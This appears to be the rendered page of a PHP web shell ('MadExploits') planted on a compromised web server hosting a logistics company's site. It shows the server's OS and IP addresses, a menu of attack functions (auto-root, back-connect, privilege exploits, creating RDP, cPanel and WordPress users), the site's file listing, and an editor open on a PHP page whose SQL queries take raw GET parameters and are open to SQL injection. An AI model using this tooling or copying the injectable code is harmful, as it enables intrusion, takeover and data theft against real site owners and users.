Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.135.64.92
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
3xlogistics.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
0language.php
3.87
KB
-rw-r--r--
1Head.php
5.32
KB
-rw-r--r--
2Menu.php
4.08
KB
-rw-r--r--
2Menu_Mobile.php
838
B
-rw-r--r--
2Menu_PC.php
6.6
KB
-rw-r--r--
3footer.php
2.05
KB
-rw-r--r--
4End.php
1.11
KB
-rw-r--r--
about.php
18.25
KB
-rw-r--r--
accessibility.php
2.94
KB
-rw-r--r--
air_freight.php
2.8
KB
-rw-r--r--
certificated.php
4.17
KB
-rw-r--r--
content.php
469
B
-rw-r--r--
content_detail.php
7.08
KB
-rw-r--r--
content_list.php
3.85
KB
-rw-r--r--
customerservice.php
6.3
KB
-rw-r--r--
documents.php
124.45
KB
-rw-r--r--
faq.php
8.04
KB
-rw-r--r--
for-business.php
84.05
KB
-rw-r--r--
fraud-awareness.php
15.03
KB
-rw-r--r--
get-quote.php
1.1
KB
-rw-r--r--
googlef0da6945598bd8e7.html
53
B
-rw-r--r--
index.php
11.08
KB
-rwxr-xr-x
index_banner1.php
4.21
KB
-rw-r--r--
index_information.php
421
B
-rw-r--r--
index_logistics_consulting_ser...
3.48
KB
-rw-r--r--
index_shipping_services.php
2.8
KB
-rw-r--r--
legal-notice.php
3.43
KB
-rw-r--r--
logisticssolutions.php
3.12
KB
-rw-r--r--
news-event.php
4.19
KB
-rw-r--r--
ocean_freight.php
2.88
KB
-rw-r--r--
pallets.php
9.93
KB
-rw-r--r--
profile-detail.php
5.71
KB
-rw-r--r--
shipnow.php
81
KB
-rw-r--r--
terms-of.php
7.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile-detail.php
<?PHP include '1Head.php'; ?> <div class="iparys_inherited"> <div class="l-view " style="background: #fff;"> <?PHP include '2Menu.php'; ?> <div class="js--nav-padding-layer c-nav--padding-layer"></div> <span class="link-anchor" id="parsysPathStage_marketing_stage_trac"></span> <nav class="c-component-breadcrumb l-grid"> <span class="sr-only">You are here</span> </nav> <main id="wcag-main-content"> <?PHP if ((isset($_GET['ID'])) or (isset($_GET['CID'])) or (isset($_GET['LID']))) { $ID = trim($_GET['ID']); $CID = trim($_GET['CID']); $LID = trim($_GET['LID']); } else { $ID = 0; $CID = 0; $LID = 0; } $CategoryContent_ID = $CID; $CategoryContentLanguage_ID = $LID; $ContentID = $ID; $SQL_blog_detail =" SELECT content.Content_ID, content.CategoryContent_ID, category_content.CategoryContent_Name, content.CategoryContentLanguage_ID, category_content_language.CategoryContentLanguage_NameTH, category_content_language.CategoryContentLanguage_NameEN, category_content_language.CategoryContentLanguage_IMG, content.StatusContent_ID, status_content.StatusContent_Name, content.Member_ID, member.Member_PrefixNameEN, member.Member_NameEN, content.Content_Name, content.Content_Content1, content.Content_Content2, content.Content_Content3, content.Content_Content4, content.Content_Content5, content.Content_Sort, content.Content_Date, content.Content_Time, content.Content_Number, content.Content_Visitors, member.Position_ID, position.Position_Name FROM position INNER JOIN (member INNER JOIN (status_content INNER JOIN ((content INNER JOIN category_content ON content.CategoryContent_ID = category_content.CategoryContent_ID) INNER JOIN category_content_language ON content.CategoryContentLanguage_ID = category_content_language.CategoryContentLanguage_ID) ON status_content.StatusContent_ID = content.StatusContent_ID) ON member.Member_ID = content.Member_ID) ON position.Position_ID = member.Position_ID WHERE content.CategoryContentLanguage_ID = $CategoryContentLanguage_ID AND content.CategoryContent_ID = $CategoryContent_ID AND content.Content_ID = $ContentID AND content.StatusContent_ID = 1 ORDER BY content.Content_ID asc "; $objQuery_blog_detail = $objConnect->query($SQL_blog_detail); while ($objResult_blogdetail = mysqli_fetch_array($objQuery_blog_detail)) { $ContentID_blogdetail = $objResult_blogdetail["Content_ID"]; $CategoryContentID_blogdetail = $objResult_blogdetail["CategoryContent_ID"]; $CategoryContentLanguageID_blogdetail = $objResult_blogdetail["CategoryContentLanguage_ID"]; $ContentName = $objResult_blogdetail["Content_Name"]; $ContentContent1_blogdetail = $objResult_blogdetail["Content_Content1"]; $ContentContent2_blogdetail = $objResult_blogdetail["Content_Content2"]; $ContentContent3_blogdetail = $objResult_blogdetail["Content_Content3"]; $ContentContent4_blogdetail = $objResult_blogdetail["Content_Content4"]; $ContentContent5_blogdetail = $objResult_blogdetail["Content_Content5"]; $ContentNumber = $objResult_blogdetail["Content_Number"]; $ContentDate = $objResult_blogdetail["Content_Date"]; $ContentTime = $objResult_blogdetail["Content_Time"]; $date = date_create($ContentDate); $ContentDate_blogdetail = date_format($date,"d-F-Y"); $ContentContent1_blogdetail = urldecode($ContentContent1_blogdetail); $ContentContent2_blogdetail = urldecode($ContentContent2_blogdetail); $ContentContent3_blogdetail = urldecode($ContentContent3_blogdetail); $ContentContent4_blogdetail = urldecode($ContentContent4_blogdetail); $ContentContent5_blogdetail = urldecode($ContentContent5_blogdetail); $New_ContentDate = date("d-m-Y", strtotime($ContentDate)); $SQL_Content_Img_Single = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID_blogdetail ORDER BY ContentImg_Sort LIMIT 1 "; $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID_blogdetail ORDER BY ContentImg_Sort desc "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img_Single); $objQuery_Content_Img2 = $objConnect->query($SQL_Content_Img); $objQuery_Content_Img3 = $objConnect->query($SQL_Content_Img); while ($objResult_Content_Img2 = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG2_ContentImgID = $objResult_Content_Img2["ContentImg_ID"]; $CIMG2_ContentImgName = $objResult_Content_Img2["ContentImg_Name"]; } ?> <span class="link-anchor" id="parsysPath_page_headline"></span> <div class="c-page-headline component-small has-rte component-margin"> <div class="c-page-headline--wrapper"> <h1><?= $ContentContent1_blogdetail; ?></h1> <br> </div> <?= $ContentContent3_blogdetail; ?> </div> <?PHP } ?> <a class="base-button c-go-to-top-button js--go-to-top-button has-icon icon-arrow-up-sharp" href="#" title="go to top" aria-label="go to top" data-tracking="{"component":"go-to-top-button"}"></a> </main> <?PHP include '3footer.php'; ?> </div> </div> <?PHP include '4End.php'; ?>
Close